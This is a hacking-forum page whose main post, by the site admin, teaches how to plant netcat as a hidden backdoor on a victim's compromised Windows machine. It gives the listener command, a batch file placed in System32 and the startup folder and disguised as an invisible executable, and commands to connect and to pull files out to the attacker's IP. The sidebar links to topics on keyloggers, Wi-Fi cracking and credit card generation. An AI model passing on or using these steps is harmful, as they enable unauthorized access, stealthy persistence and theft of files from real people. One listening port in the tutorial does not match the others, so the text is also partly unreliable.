Ethical Experts
Ethical Experts
Ethical Experts
Would you like to react to this message? Create an account in a few clicks or log in to continue.
Ethical Experts

A Community Dedicated to Helping and Learning . Here You Will Get Hacking Tutorials and Monetizing Methods . We Hope You Have a Pleasant Stay
 
HomeHome  SearchSearch  Latest imagesLatest images  RegisterRegister  Log in  
Still Currently working on the forum design, until I find a perfect design that can sit there for the whole life :p .. Please Bare with us if you see the design change while / after you refresh a page or return ! Sorry for the Inconvenience ~!
Search
 
 

Display results as :
 
Rechercher Advanced Search
Latest topics
» Hack Pack : Largest Hacking Tools Collection
Netcat Tutorial : Using Netcat As Backdoor EmptyTue Apr 28, 2015 9:35 am by THE-OUTSIDER

» Hi everyone!
Netcat Tutorial : Using Netcat As Backdoor EmptyFri Nov 07, 2014 11:24 pm by zekrum

» Hacking Email ID's
Netcat Tutorial : Using Netcat As Backdoor EmptyThu Sep 25, 2014 7:22 pm by NAVEEN KUMAR . S

» entering in a computer binary
Netcat Tutorial : Using Netcat As Backdoor EmptySat Sep 20, 2014 1:29 pm by erosh23

» hi hackers
Netcat Tutorial : Using Netcat As Backdoor EmptySat Sep 20, 2014 1:26 pm by erosh23

» Introduce Yourself !
Netcat Tutorial : Using Netcat As Backdoor EmptySat Sep 20, 2014 1:23 pm by erosh23

» Hello guys
Netcat Tutorial : Using Netcat As Backdoor EmptyWed Jul 30, 2014 10:52 pm by RZero67

» need botnet like zues Betabot or any good botnet files please admin help me
Netcat Tutorial : Using Netcat As Backdoor EmptyFri Jul 25, 2014 9:44 pm by sire_roktiv

» Extension Spoofer v0.1 [Beta Release]
Netcat Tutorial : Using Netcat As Backdoor EmptyFri Jul 11, 2014 9:33 am by The Joker

Most Viewed Topics
Hack Pack : Largest Hacking Tools Collection
HACK WIFI PASSWORD USING CMD WHEN YOU ARE CONNECTED WITH WIFI
Hack Your BroadBand !! RISK FREE !!
Hacking With Keyloggers Prorat
How to Hack the Windows Admin Password Using OphCrack in Backtrack tutorial
How to Get Unlimited time in an Internet Cafe ... :D
How to Hack Websites & Servers - Tutorial
Cracking a WPA/WPA-2 Password.. ;)
Backtrack and Facebook
Credit Card Generating Sequence
Keywords
LARGEST netcat hack wifi
Facebook Like
Similar topics

 

 Netcat Tutorial : Using Netcat As Backdoor

Go down 
AuthorMessage
The Joker
Admin
Admin
The Joker


Posts : 182
Join date : 2012-06-11
Age : 33

Netcat Tutorial : Using Netcat As Backdoor Empty
PostSubject: Netcat Tutorial : Using Netcat As Backdoor   Netcat Tutorial : Using Netcat As Backdoor EmptyWed Sep 26, 2012 6:58 am

In this following tutorial we will use netcat as Trojan, Backdoor and file transfer wizard. So let's see some other features of netcat.

Now for using netcat as Trojan or backdoor you must have a compromised system that means for planting netcat as Trojan or backdoor you must have intruded system. I assume you managed to hack system using a RAT client. Now upload netcat to the compromised system. Copy netcat to C:\Windows\System32 folder in victim's PC.

Now type following commands in notepad and save as winlog.bat.

nc -L -p 23 -t

now here's what you told netcat to do,
L - start listening(even if the port is closed) an alternative is ' l '
p - on port number
t - carry out telnet sessions

that means you asked netcat to list on port number 23 to carry out telnet sessions. Upload this file to C:\Windows\System32 folder in victim's system. Create shortcut to winlog.bat after pasting it in C:\Windows\System32 folder and paste that shortcut in windows startup folder. Now there's a problem with above method, bat process will be visible as foreground process. To tackle this problem download batch 2 hidden exe maker. And make winlog.exe from winlog.bat don't forget to check radio button for invisible application. Upload winlog.exe instead of winlog.bat to C:\Windows\System32 folder, create shortcut and place shortcut in startup folder.

Netcat Tutorial : Using Netcat As Backdoor 480244_474363469261237_1602484990_n

Now whenever your victim will start his computer netcat will start with it. Now this is how you can basically use Netcat as Trojan or Backdoor further use is left to your creativity.

Ok, lets connect to victim using netcat, we asked netcat in victim's system to listen on port 23 so we will connect it to that port,

C:\>nc victim_IP 23

this command will connect your PC to victim with telnet privileges of current user and if the logged in user is administrator you will get his/her privileges. Now if you want to transfer any file from victim's PC to your's. You have to type following commands on victim's PC after connecting it with netcat,

C:\>nc your_ip 1234 < file_name

Above command will open port 1234 for transferring file. ' < ' tells to redirect file_name to specified port. Now open new command prompt in your system and type following commands,

C:\>nc -l -p 80 > file_name

Above command tells netcat to listen on port number 1234 and redirect incoming data to file_name. Like this you can use netcat as file transfer wizard. If you want to transfer file from your system to victim use above commands vise-versa.

By the way there are several ways you can put netcat to use. Thanks for reading and keep visiting.
Back to top Go down
http://teamiha.tumblr.com
 
Netcat Tutorial : Using Netcat As Backdoor
Back to top 
Page 1 of 1
 Similar topics
-
» Netcat Advanced: Backdoor Creation
» Tab Napping Tutorial
» How to Hack Websites & Servers - Tutorial

Permissions in this forum:You cannot reply to topics in this forum
Ethical Experts :: Hacking Section :: Hacking Tutorials-
Jump to: